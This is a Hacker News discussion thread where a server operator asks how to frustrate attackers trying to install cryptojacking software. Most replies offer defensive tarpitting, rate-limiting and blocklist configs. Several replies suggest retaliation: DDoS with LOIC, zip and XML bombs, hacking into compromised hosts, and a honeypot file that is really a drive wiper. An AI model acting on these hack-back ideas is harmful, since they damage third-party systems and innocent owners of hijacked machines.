[HN Gopher] Ask HN: Best Way to Mess with Hackers?
___________________________________________________________________
Ask HN: Best Way to Mess with Hackers?
I am watching my fail2ban logs on my servers and while this tool is
fine and will probably annoy them a little, is there a more fun way
to mess with these people? I can see from the failed attempts that
are trying to curl the kiss a dog cryptojacking software, so they
aren't simply probing my server - they are trying to cause harm.
Preferably legal. Making them lose money would be great too!
Author : AJRF
Score : 23 points
Date : 2023-01-29 16:36 UTC (6 hours ago)
| ROTMetro wrote:
| Post that you are releasing your source code as free while
| releasing it under the GPL license not BSD/MIT. That will make
| them go ballistic :)
| nszceta wrote:
| Low Orbit Ion Cannon (LOIC)
| return_to_monke wrote:
| if you have people wanting SSH, there's this:
|
| https://github.com/skeeto/endlessh
| JZerf wrote:
| Tarpitting in general can be fun. I have an iptables rule set
| up on my mail server that limits incoming SMTP traffic from
| suspected spammers to just three packets per minutes (which is
| still fast enough for a legitimate mail server to deliver your
| typical, less than 250 KB email in under an hour in case you
| accidentally ensnare a legitimate sender) and I've seen it
| often tying up spammers for 15+ minutes at a time. Below is a
| sample of a rule I might use in case anyone else is interested:
| iptables --append INPUT --source 1.1.1.1,1.1.1.0/24 --protocol
| tcp --dport smtp --match hashlimit --hashlimit-name
| HASHES_FOR_PROBABLE_SPAMMER_THROTTLING --hashlimit-mode srcip
| --hashlimit-above 3/minute --hashlimit-burst 1 --jump DROP
| LinuxBender wrote:
| _fun way to mess with these people?_
|
| To some extent yes, give them a status 200 for anything they send
| at you, especially for your default catch-all domain/IP/virtual-
| host. In NGinx this looks like error_page 404
| 500 501 502 503 504 =200 /some_generic_message.html;
|
| I would personally just disable fail2ban. It just consumes more
| CPU especially if using it with iptables. If using _ip route
| blackhole {ip}_ its not as bad but still a waste of time in my
| opinion. There are enough known compromised hosts out there to
| add millions of entries to your routing table ahead of time. [1]
|
| Add headers and content to the generic message file that has
| links to URL's like WordPress, wp_login.php, wp-story.php,
| js/file-uploader, nf_tracking.php, about.php, wp-reset.php and
| others. To minimize writes on your disk, set custom logs for your
| default virtual-host/IP/domains to either write into a tmpfs ram
| disk or to /dev/null once you get bored watching them. If writing
| to tmpfs be sure to set up a more frequent log rotation and less
| retention. Be sure to also set the HTTP keepalive time very low
| so they are not wasting your resources. No need to tarpit them,
| most of the code used by these bots will time out after a few
| seconds.
|
| [Edit] I should add, these are not hackers you are messing with.
| They are just parasitical script-kiddies that prey on the weak,
| most often using their batches of WordPress hosts as jump-off
| points and watering hole phishing sites to scam the elderly out
| of their life savings.
|
| _Making them lose money would be great too!_
|
| That's much harder. Most of the IP's you see do not belong to the
| attacker. The attacker is likely using a set of Command and
| Control _C &C_ nodes that control a swath of end-user PC's and
| Wordpress servers infected with malware. Anything you do will
| cost them nothing but it might slow their threads down a little.
| The only way to make them lose money would be to find who is
| controlling the C&C nodes, gather evidence and have law
| enforcement take them down. To do this one would have to break
| the law by hacking into the compromised host and see what C&C
| nodes it is dialing home to, then hack into those hosts and see
| who is connecting to them. They could be using Tor but most
| people are lazy enough to not do this.
|
| [1] - https://github.com/firehol/blocklist-ipsets.git
| moomoo11 wrote:
| If someone tries to find your .env (obv I'm not dumb enough to
| expose it) have it ddos the originator instead.
| aww_dang wrote:
| Set gzip encoding, respond with gigabytes of gzipped zeroes.
|
| https://en.wikipedia.org/wiki/Zip_bomb
|
| There's more you can do when they actually parse documents. XML +
| XSLT can overflow some systems. Even just a deep html document
| tree can use up resources.
| LinuxBender wrote:
| That's a fun one. Also 32GB favicon.ico's for the default
| catch-all host/IP assuming one is OK with the extra bandwidth
| usage.
| colanderman wrote:
| Straight XML often suffices, no XSLT needed:
| https://en.m.wikipedia.org/wiki/Billion_laughs_attack
| cypherg wrote:
| make an ssh honeypot (in docker) that is extremely limited in
| speed/bandwidth. Have only one small binary in the home folder
| called "PASSWORD_STORAGE" that has no execute permissions.
| Hopefully someone will download the binary to their own machine
| an execute it. Instead of a benign file, "PASSWORD_STORAGE"should
| be a disk encryptor/drive wiper.
___________________________________________________________________
(page generated 2023-01-29 23:02 UTC)